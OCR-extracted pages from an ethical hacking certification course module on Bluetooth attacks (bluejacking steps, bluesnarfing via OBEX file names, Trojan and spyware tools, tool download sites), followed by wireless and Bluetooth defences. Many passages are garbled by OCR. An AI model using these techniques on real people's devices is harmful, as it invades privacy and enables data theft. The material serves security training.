Bluetooth is a short-range wireless communication technology intended to replace the cables connecting portable or fixed devices while maintaining high levels of security. It allows mobile phones, computers, and other devices to exchange information using a shortrange wireless connection. Two Bluetooth-enabled devices connect through the pairing technique. There are some Bluetooth security issues that are vulnerable and make hijacking on Bluetooth devices possible. Bluetooth hacking refers to the exploitation of Bluetooth stack implementation vulnerabilities to compromise sensitive data in Bluetooth-enabled devices and networks. The following are Bluetooth device attacks:
B lu e j a c k in g

Bluejacking is the use of Bluetooth to send messages to users without the recipient's consent, similar to email spamming. Prior to any Bluetooth communication, the initiating device must provide a name that will be displayed on the recipient's screen. Because this name is userdefined, it can be set to be an annoying message or advertisement. Strictly speaking, Bluejacking does not cause any damage to the receiving device. It may, however, be irritating and disruptive to its victims.
B lu e S n if f

BlueSniff is proof of concept code for a Bluetooth wardriving utility. It is useful for finding hidden and discoverable Bluetooth devices. It operates on Linux.

Module 15 Page 2334

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

O

B lu e s m

a c k in g

A Bluesmacking attack is when an attacker sends an oversized ping packet to a victim's device. This causes a buffer overflow in the victim's device. This type of attack is similar to an ICMP ping of death.
B lu e s n a r f in g

Bluesnarfing is a method of gaining access to sensitive data in a Bluetooth-enabled device. If an attacker is within range of a target, he or she can use special software to obtain the data stored on the victim's device. To Bluesnarf, an attacker exploits a vulnerability in the protocol that Bluetooth uses to exchange information. This protocol is called Object Exchange (OBEX). The attacker connects with the target and performs a GET operation for files with correctly guessed or known names, such as /pb.vcf for the device's phonebook or telecom /cal.vcs for the device's calendar file.

Module 15 Page 2335

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

B lu e to o th S ta c k

CEH
Bluetooth Modes
Discoverable modes
1. Discoverable: Sends inquiry responses to all inquiries 2. Limited discoverable: Visible for a certain period of time Non-discoverable: Never answers an inquiry scan

3. L2CAP

Pairing modes
1. Link Manager Audio 2. Baseband Pairable mode: Will pair upon request Non-pairable mode: Rejects every pairing request

Bluetooth Radio

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

B l u e t o o th S ta c k
‫ז‬ ‫ י‬A Bluetooth stack refers to an implementation of the Bluetooth protocol stack. It allows an inheritance application to work over Bluetooth. Using Atinav's OS abstraction layer, porting to any system is achieved. The Bluetooth stack is divided into: general purpose and embedded system.

B lu e t o o t h

M

o d e s

D is c o v e r a b le

M

o d e s

Basically, Bluetooth operates in three discoverable modes. They are: Q Discoverable: When Bluetooth devices are in discoverable mode, the devices are able to be seen by other Bluetooth-enabled devices. If a phone is trying to connect to another phone, the phone that is trying to establish the connection must look for a phone that is in "discoverable mode," otherwise the phone that is trying to initiate the connection will not be able to detect the other phone. Discoverable mode is necessary only while connecting to the device for the first time. Once the connection is saved, the phones know each other; therefore, discoverable mode is not necessary for lateral connection establishment.

Module 15 Page 2336

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

Limited discoverable: In limited discoverable mode, the Bluetooth devices are discoverable only for a limited period of time, for a specific event, or during temporary conditions. However, there is no HCI command to set a device directly into limited discoverable mode. It must be done indirectly. When a device is set to the limited discoverable mode, it filters out non-matched lACs and discovers itself only to those that matched. Non-discoverable: Setting the Bluetooth device to "non-discoverable" mode prevents the devices from appearing on the list during Bluetooth-enabled device search process. However, it is still visible to those users and devices who paired with the Bluetooth device previously or who are familiar with the MAC address of the Bluetooth.
P a ir in g M o d e s

Q

[& .A1 9

a

There are two modes of pairing for Bluetooth devices. They are: Non-pairable mode: In non-pairable mode, a Bluetooth device rejects the pairing request sent by any device. Pairable mode: In pairable mode, the Bluetooth device accepts the pairing request upon request and establishes a connection with the pair requesting device.

9

HCI
o
o
Cl

Link Manager

Audio

t O

Baseband

a . ‫ו‬/‫ו‬ c
> ‫ס‬

Bluetooth Radio
FIGURE 15.72: Bluetooth Stack

Module 15 Page 2337

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

B lu e to o th T h r e a ts

C EH

Leaking Calendars and Address Books
Attacker can steal user's personal information and can use it for malicious purposes

Rem ote Control
Hackers can remotely control a phone to make phone calls or connect to the Internet

Bugging Devices
Attacker could instruct the user to make a phone call to other phones without any user interaction. They could even record the user's conversation

Social Engineering
Attackers trick Bluetooth users to lower security or disable authentication for Bluetooth connections in order to pair with them and steal information

Sending SMS M essages
Terrorists could send false bomb threats to airlines using the phones of legitimate users

M alicious Code
Mobile phone worms can exploit a Bluetooth connection to replicate and spread itself

Causing Financial Losses
Hackers could send many MMS messages with an international user's phone, resulting in a high phone bill J

Protocol V ulnerabilities
Attackers exploit Bluetooth parings and communication protocols to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

^

B lu e to o th T h r e a t s

Similar to wireless networks, Bluetooth devices also subject to various threats. Due to the security flaws in the Bluetooth technology, various Bluetooth threats can take place. The following are the threats to Bluetooth devices: 9 Leaking calendars and address books: An attacker can steal a user's personal information and can use it for malicious purposes. Bugging devices: An attacker could instruct the user to make a phone call to other phones without any user interaction. They could even record the user's conversation. Sending SMS messages: Terrorists could send false bomb threats to airlines using the phones of legitimate users. Causing financial losses: Hackers could send many MMS messages with an international user's phone, resulting in a high phone bill. Remote control: Hackers can remotely control a phone to make phone calls or connect to the Internet. Social engineering: Attackers trick Bluetooth users to lower security or disable authentication for Bluetooth connections in order to pair with them and steal information.

9

9

Q

9

9

Module 15 Page 2338

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

Malicious code: Mobile phone worms can exploit a Bluetooth connection to replicate and spread. Protocol vulnerabilities: Attackers exploit Bluetooth parings and communication protocols to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.

9

Module 15 Page 2339

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

H o w to B lu e ja c k a V ic tim

CEH

Bluejacking is the activity of sending anonymous messages over Bluetooth to Bluetoothenabled devices such as PDAs, laptops, mobile phones, etc. via the O BEX protocol

J

Select an area with plenty of mobile users, like a cafe, shopping center, etc. Go to contacts in your address book (You can delete this contact entry later)

J

Create a new contact on your phone address book Enter the message into the name field Ex: "Would you like to go on a date with me?"

J

Save the new contact with the name text and without the telephone number Choose "send via Bluetooth". These searches for any Bluetooth device within range

J

Choose one phone from the list discovered by Bluetooth and send the contact You will get the message "card sent" and then listen for the SMS message tone of your victim's phone

J J

J

. J

L

c = c§=‫!׳‬ r U * = * J J

^= L.
II M l II III

Copyright © by EG-C*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w to B l u e j a c k a V ic tim
___‫ ״‬Bluejacking is "temporarily hijacking another person's cell phone by sending it an anonymous text message using the Bluetooth wireless networking system." The operating range for Bluetooth is 10 meters. Phones embedded with Bluetooth technology can search for other Bluetooth-integrated phones by sending messages to them. Bluejacking is a new term used to define the activity of sending anonymous messages to other Bluetooth-equipped devices via the OBEX protocol. Follow the steps mentioned as follows to Bluejack a victim or a device: STEP 1: Select an area with plenty of mobile users, like a cafe, shopping center, etc. Go to contacts in your address book. STEP 2: Create a new contact in your phone address book. Enter a message into the name field, e.g., "Would you like to go on a date with me?" (You can delete this contact entry later.) STEP 3: Save the new contact with the name text and without the telephone number. Choose "send via Bluetooth." This searches for any Bluetooth device within range. STEP 4: Choose one phone from the list discovered by Bluetooth and send the contact. You will get the message "card sent" and then listen for the SMS message tone of your victim's phone.

Module 15 Page 2340

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Bluetooth H acking Tool: Super Bluetooth Hack
J J
J A Bluetooth Trojan when infected allows the attacker to control and read information from victim phone Uses Bluetooth AT commands to access/hack other Bluetooth-enabled phones Once infected, it enables attackers to read messages and contacts, change profile, manipulate ringtone, restart or switch off the phone, restore factory settings and make calls from a victim's phone

CEH

Copyright © by EG-G(nncil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o l: S u p e r B lu e to o th H a c k
A Bluetooth Trojan, when infected, allows the attacker to control and read information from the victim's phone. It uses Bluetooth AT commands to access/hack other Bluetoothenabled phones. Once infected, it enables attackers to read messages and contacts, change profile, manipulate ringtone, restart or switch off the phone, restore factory settings, and make calls from a victim's phone. Super Bluetooth Hack is Mobile Bluetooth hacking software. The tool requires the victim to accept the Bluetooth connection first, but this is just a one-time procedure for pairing the phones. Then it doesn't require pairing the phones in the future.

Module 15 Page 2341

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

F IG U R E1 5 .7 2 :S u p e rB lu e to o th H a c ks c re e n s h o ts

Module 15 Page 2342

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Bluetooth Hacking Tool: PhoneSnoop
PhoneSnoop is BlackBerry spyware that enables an attacker to remotely activate the microphone of a BlackBerry handheld and listen to sounds near or around it, PhoneSnoop is a component of Bugs - a proof-of-concept spyware toolkit

CEH

It exists solely to demonstrate the capabilities of a BlackBerry handheld when used to conduct surveillance on an individual It is purely a proof-of-concept application and does not possess the stealth or spyware features that could make it malicious

SED 0 1 1 :3 9P M
D o w n lo a d s

Name: Version:
V e n d o r:

PhoneSnoop

1.0

ZenConsult
The application w as successfully installed

Sizc:^■
D o s c B fi

lit ‫ו‬

C °!□

PhoneSnoop

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o l: P h o n e S n o o p
PhoneSnoop is BlackBerry spyware that enables an attacker to remotely activate the microphone of a BlackBerry handheld and listen to sounds near or around it; PhoneSnoop is a component of Bugs, a proof-of-concept spyware toolkit. It exists solely to demonstrate the capabilities of a BlackBerry handheld when used to conduct surveillance on an individual. It is purely a proof-of-concept application and does not possess any of the stealth or spyware features that make it malicious.
(M O 011:39 PM

‫מ‬

Downloads

N a m e : V ersion: V e n d or: S iz e : D e s c f C

P h o n e S n o o p* 1 .0 Z e n C o n s u lt M .O K B T h ea p p lic a tio nw a ss u c c e s s fu lly in s ta lle d . fijjH ( 0 K ) ( R u n ‫ו‬ _ _ _ _ _ _ _ _ _ _ _ _ 1

PhoneSnoop
F IG U R E 15.72: Ph o n eSn o o p screenshots

Module 15 Page 2343

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Bluetooth H acking Tool: BlueScanner

CEH

}‫כ‬
A
Arjto Cen*;.‫׳‬t EtucScnmcr -Blurtcorh Device Discovery Ffca Help fik

A Bluetooth device discovery and vulnerability assessment tool for Windows
* pi

(Q O r lEA 3 2 9 Er5 D |
Bluetooth Device Information

lyc ‫ר‬0/25/‫ו‬031‫קר‬.‫ו‬CelUaPhcre ‫ ו‬0> ‫׳‬ 2‫ ע‬10»‫ וו‬7‫ ; ו‬sdp

8 1( &36

Discover Bluetooth devices type (phone, computer, keyboard, PDA, etc.), and the services that are advertised by the devices Records all information that can be gathered from the device, without attempting to authenticating with the remote device

CeMyFtwre(!)

rq l' I M 0 k 1 »P C $ tf*t1 l

G "1 « m IR 3 w 5 D P |
Lac«la | *

( 1 1 A jd u 6 «t***f1 l
COW I

Ik4 ‫)״״■•׳‬ r11feavtftcc.n1 Per•*-.,, aecx » .«5f 1ah(!1

aecx rirT M itf(• (!!

CO M1 Vatw 3J v .w ill It I Ilnl*V W 1y Urkncwn

D r t t > 1 p 1 v * iw e r i> jr n N^PCSJl. U r k n c w n UrKncwn N tfM ik A c c tte P o h i
GEE'Ghcoc Pu8h CBEXFife

ri‫ ״‬rt ,,n:U. ' <r.n (IJ S>**WLCiert(l) Mu e Payer | 1 J

H e d «£ * 8 X1C 2 J
&IMMXESSII)

□H 1 d »n j.lh i c e *

N c fc ia S y r e M lS e r v e r SyncML 0»rl ___ M m e P a u C T

Copyright © by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o l: B l u e S c a n n e r
BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows XP. Aruba Networks BlueScanner is provided under the Aruba Software License. With a Bluetooth adapter, organizations can use BlueScanner to discover Bluetooth devices, their type (phone, computer, keyboard, PDA, etc.), and the services that are advertised by the devices. It will identify any discoverable devices within range and record all information that can be gathered from the device, without attempting to authenticate with the remote device. This information includes the device's "human friendly" name, unique address, type, time of discovery, time last seen, and any Service Discovery Protocol (SDP) information provided by the device.

Module 15 Page 2344

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

/A Aruba Networks BlueScanner ‫ ־‬Bluetooth Device Discovery File Configure Nft»wr»k [‫י‬/ Apply Filter Last Seen
Now (1)

Filter *j

Mansge

Help

Loo

t

Sizzle ... (00:1EA3:29:EF:5D)

1

First Seen/LastSsen 10/25/10 at 17:16:35 (8) 10/25/10 al 17:17:38

Tipe/Flags Celular Phone

Location
None (I)

Bluetooth Device Information Sizzlei... (00:1EA3:29:EF:5D) General RawSDP

Type
Cellulai Phone (1)

Services
Dial-up networking (1) Nokia PC Suite (1) COM 1(1) Voice Gateway (1) Audio Gateway (1) Unknown (4) Netwoik Access Point Service (1) OBEX Hbjcct Push (1) OBEX r ile Transfer (1) Nokia SyncML Server (1) SyncML Client (1) Music-Player (1) Media 3layer (2) SIM ACCESS (1)

m
Advertised Services Dial-up networkng Nokia PC Suite COM 1 Voice Gateway
Audio Gateway

Unknown Unknown Unknown Network Acces: Point Service Unknown OBEX Obted Push OBEX Fie Trance*
N(Ai<j S y « S a v e i

SyncML CSent Music-Ptavet

Hide Inactive Devices

F IG U R E 15.73: B lu eScan n e r screenshot

Module 15 Page 2345

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

B lu e to o th H a c k in g T o o ls

CEH

BTBrowser
f N http://wireless.klings.org

Blooover
http://trifinite.org

m %> “ H!

BH Bluejack
http://croozeus.com

|7

n

BTScanner
http://www.pentest.co.uk

Bluesnarfer
http://www.airdem on.net

4 ^ 0

CIHwBT
http://sourceforge.net

BTCrawler
http://www.silentservices.de

*

BT Audit
http://trifinite.org

Bluediving
^ 1 http://bluediving.sourceforge,net

BlueAlert
http://www.insecure.in

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o ls
Bluetooth hacking tools allow attackers to extract as much information as possible from a Bluetooth device without the requirement to pair. These tools are used to scan for other visible devices in range and can perform a service query. A few tools used to perform Bluetooth hacking are listed as follows: 9 9 9 9 s 9 BTBrowser available at http://wireless.klings.org BH Bluejack available at http://croozeus.com Bluesnarfer available at http://www.airdemon.net BTCrawler available at http://www.silentservices.de Bluediving available at http://bluediving.sourceforge.net Blooover available at http://trifinite.org

Q BTScanner available at http://www.pentest.co.uk 9 9 9 CIHwBT available at http://sourceforge.net BT Audit available at http://trifinite.org BlueAlert available at http://www.insecure.in

Module 15 Page 2346

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module Flow

CE H

m
_______

M o d u l e F lo w

So far, we have discussed wireless concepts, wireless encryption, threats associated with wireless networks, hacking methodology, various wireless hacking tools, and Bluetooth hacking. All these concepts and tools help in hacking or penetrating a wireless network. Now we will go over the countermeasures that can help in patching the determined security loopholes. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. This section is dedicated to countermeasures and the practices that can defend against various hacking techniques or methods.

Wireless Concepts

A

Wireless Threats

Wireless Hacking Tools

HI • p

Wireless Encryption

Wireless Hacking Methodology

Bluetooth Hacking

Module 15 Page 2347

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2348

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Defend Against Bluetooth Hacking
Use non-regular patterns as PIN keys while pairing a device. Use those key combinations which are non-sequential on the keypad

CEH

Keep BT in the disabled state, enable it only when needed and disable immediately after the intended task is completed

Always enable encryption when establishing BT connection to your PC

Keep the device in nondiscoverable (hidden) mode

Keep a check of all paired devices in the past from time to time and delete any paired device which you are not sure about

DO NOT accept any unknown and unexpected request for pairing your device

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w to D e f e n d A g a i n s t B lu e to o th H a c k i n g
Even though security gaps are being filled periodically by the manufacturer and technologist, the following are some of the tips that a normal user should keep in mind and protect himself or herself away from an amateur BT hacker: e Keep BT in the disabled state; enable it only when needed and disable immediately after the intended task is completed. Keep the device in non-discoverable (hidden) mode. DO NOT accept any unknown and unexpected request for pairing your device. Keep a check of all paired devices in the past from time to time and delete any paired device which you are not sure about.

9 9 9

Q Always enable encryption when establishing BT connection to your PC. 9 Use non regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential and non-obvious on the keypad.

Module 15 Page 2349

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

H o w to D e t e c t a n d B l o c k R o g u e A P

CEH
l*rt«f**4 itfeul •U.U.

Detecting Rogue A P
R F S c a n n in g
Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN administrator about any wireless devices operating in the area J

B locking Rogue AP
Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN

J

A P S c a n n in g
Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface

U s in g W ire d S id e Inp u ts
Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, CDP (Cisco discovery protocol) using multiple protocols

Copyright © by EC-GOIIIlCil. All Rights Reserved. Reproduction isStrictly

Prohibited.

H o w to D e t e c t a n d B lo c k R o g u e A P s
Detecting and blocking rogue access points are important tasks that need to be implemented to ensure the security of a wireless network and to protect the wireless network from being compromised.
D e t e c t in g R o g u e A P s

A rogue AP is one that is not authorized by the network administrator for operation. The problem associated with these rogue APs is that these APs don't conform to wireless security policies. This may enable an insecure open interface to the trusted network. There are various techniques available to detect rogue AP. Following are the techniques to detect rogue APs: RF scanning: Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN administrator about any wireless devices operating in the area. These sensors don't cover the dead zones. More sensors are needed to be added, to detect the access points placed in dead zones. Q AP scanning: Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface.

Module 15 Page 2350

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

The drawback in this case is the ability of AP to discover neighboring devices is limited to certain extent. Q Using wired side inputs: Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, and CDP (Cisco discovery protocol) using multiple protocols. Irrespective of its physical location, APs present anywhere in the network can be discovered using this technique.
B lo c k in g R o g u e A P

If any rogue APs are found in a wireless LAN, then they have to be blocked immediately to avoid authorized users or clients from being associated with it. This can be done in two ways: 9 Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP

© Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN

FIGURE 15.74: Blocking Rogue AP

Module 15 Page 2351

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ire le s s S e c u rity L a y e rs

ItiVM itkxjl IU (M «

c EH

RF Spectrum Security Wireless IDS

Per-Packet Authentication, Centralized Encryption

/B \

a

Vulnerabilities and Patches j

Wireless Signal Security

Connection Security

Data Protection

WPA2 and AES

T - r

^

M

Device Security

Network Protection

End-user Protection

Strong Authentication

Stateful Per User Firewalls

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ire le s s S e c u rity L a y e rs
A wireless security mechanism has six layers to ensure security related to various [jfe__ " issues. This layered approach increases the scope of preventing the attacker from compromising a network and also increases the possibility of attacker being caught easily. The following is the structure of wireless security layers: fa
RF Spectrum Security Wireless IDS

Vulnerabilities and Patches

Wireless Signal Security

Connection Security

Data Protection

WPA2 and AES

Device Security

Network Protection

End-user Protection

Strong Authentication

Stateful Per User Firewalls

F IG U R E 15.75: Stru ctu re of W ire le s s security layers

Module 15 Page 2352

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Q Connection security: Per frame/packet authentication provides complete protection against "man-in-the-middle" attacks. It does not allow the attacker to sniff the data when two genuine users are communicating between each other thereby securing the connection. Q Device security: Both vulnerability and patch management are the important component of security infrastructure since, these two components detect and prevent vulnerabilities before they are actually misused and compromise the device security.

Q Wireless signal security: In wireless networks, continuous monitoring and managing of network and the RF spectrum within the environment identifies the threats and awareness capability. The Wireless Intrusion Detection System (WIDS) has the capability of analyzing and monitoring the RF spectrum. The unauthorized wireless devices that violate the security policies of the company can be detected by alarm generation. The activities such as increased bandwidth usage, RF interferences, and unknown rogue wireless access points etc. are the indications of the malicious network. With the help of these indications you can easily detect the malicious network and can maintain the wireless security. The attacks against the wireless network cannot be predicted. Continuous monitoring of the network is the only measure that can be used to prevent such attacks and secure the network. Network protection: Strong authentication ensures only authorized user to gain access to your network thereby protecting your network from attacker. Q Data protection: Data protection can be attained by encrypting the data with the help of the encryption algorithms such as WPA2 and AES.

Module 15 Page 2353

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Q

End-user protection: Even if the attacker is associated with the Aps, the personal firewalls installed on the end user system on the same WLAN prevents the attacker from accessing the files on an end-user device, thereby protects the end user.

Module 15 Page 2354

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to D efend A gainst W ireless Attacks
Configuration Best Practices
1

£g

SSID Settings Best Practices

Change th e defau lt SSID a fte r W L A N configuration

2

S e t th e router access password and enab le firew all protection

3

Disable SSID broadcasts

4

Disable rem ote router login and w ireless adm inistration

5

Enable M AC Address filtering on yo u r access point or router

6

Enable encryption on access point and change passphrase often

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w to D e f e n d A g a i n s t W i r e l e s s A t ta c k s
Besides using tools that monitor the security of a wireless network, users can follow some approaches to defend their networks against various threats and attacks. The following are some of the configured best practices for Wi-Fi that ensure WLAN security: e 9 9 9 Q Q Change the default SSID after WLAN configuration Set the router access password and enable firewall protection Disable SSID broadcasts Disable remote router login and wireless administration Enable MAC Address filtering on your access point or router Enable encryption on access point and change passphrase often

Module 15 Page 2355

Ethical Hacking and Countermeasures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Defend Against Wireless Attacks (C o n t’ d )
r Configuration Best Practices SSID Settings Best Practices 1 Authentication Best Practices

c EH
Itk M jl IlM h M

H |

keep certain default wireless messages from broadcasting the ID to everyone Do not use your SSID, company name, network name, or any string in passphrases firewall or packet filter in between the AP and the corporate

Limit the strength of the wireless network outside the bounds of your organization Check the wireless devices for Implement an additional technique for over wireless

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited

H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t ’d)
Wireless networks can be protected from various wireless attacks by changing the SSID settings to provide high-level security. The following are the ways to set the SSID settings that ensure WLAN security: 9 Use SSID cloaking to keep certain default wireless messages from broadcasting the ID to everyone Do not use your SSID, company name, network name, or any easy to guess string in passphrases Place a firewall or packet filter in between the AP and the corporate Intranet Limit the strength of the wireless network so it cannot be detected outside the bounds of your organization Check the wireless devices for configuration or setup problems regularly Implement a different technique for encrypting traffic, such as IPSec over wireless

9

9 9

9 9

Module 15 Page 2356

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to D ef end Against W ireless Attacks (coiit’d)
‫די‬

Urtifwtf

C EH
ItkK Jl lUckM

Configuration Best Practices___

Authentication Best Practices

L

H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t ’d)
Setting strong authentication for Wi-Fi networks access can be a considered as a measure to defend the WLAN against wireless attacks. The following are the ways to set Wi-Fi authentication to the strongest level: e 9 9 9 Choose Wi-Fi Protected Access (WPA) instead of WEP Implement WPA2 Enterprise wherever possible Disable the network when not required Place wireless access points in a secured location

© Keep drivers on all wireless equipment updated 9 Use a centralized server for authentication

Module 15 Page 2357

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to D efend A gainst W ireless Attacks (C on t’ d )

C EH

H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t ’d)
Many wireless defense techniques are adopted for protecting the network against wireless attacks and we have discussed them in a previous module. Using appropriate WIDS, RADIUS server and other security mechanisms at the right place can defend your wireless network from being attacked.

Module 15 Page 2358

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Attacker

Disassociate Unauthorized Users

A

Disable Broadcast SSID

FIGURE 15.76: Defending against wireless attacks

Module 15 Page 2359

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M o d u l e F lo w
Wireless security can be accomplished not only with manual methods but also with wireless security tools. The security tools combined with the manual methods make the WLAN more secure. This section is dedicated to wireless security tools and mechanisms.

Wireless Concepts

|E1 P
‫י‬/ —

Wireless Encryption

Wireless Threats 6 Wireless Hacking Tools

Wireless Hacking Methodology

Bluetooth Hacking

Countermeasure

Wireless Security Tools ■ y— S —r d

Wi-Fi Pen Testing

Module 15 Page 2360

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless Intrusion Prevention System s
Airsnarf Attack Wireless intrusion prevention systems protect networks against wireless threats, and enable administrators to detect and prevent various network attacks

CEH

Chopchop Attack

Day-zero Attack

Device Probing

Rogue Iden and Con

Probing and Discov! Fragmentation Attack

Honeypot

MAC Spoofing

Fake DHCP Server

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i r e l e s s I n t r u s i o n P r e v e n t i o n S y s te m s
* j A wireless intrusion prevention system (WIPS) is a network device that monitors the radio spectrum for detecting access points (intrusion detection) without the permission of the hosts in nearby locations, and it can also implement countermeasures automatically. Wireless intrusion prevention systems protect networks against wireless threats, and enable administrators to detect and prevent various network attacks.

Module 15 Page 2361

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Airsnarf Attack

Chopchop Attack

F Traffic
a r m o rin g

Day-zero Attack Netwoik Intrusion I Device Probing Rogue Idem and Con1
